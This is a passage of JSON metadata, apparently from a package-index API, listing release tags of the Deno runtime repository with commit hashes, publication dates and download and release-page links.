load.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/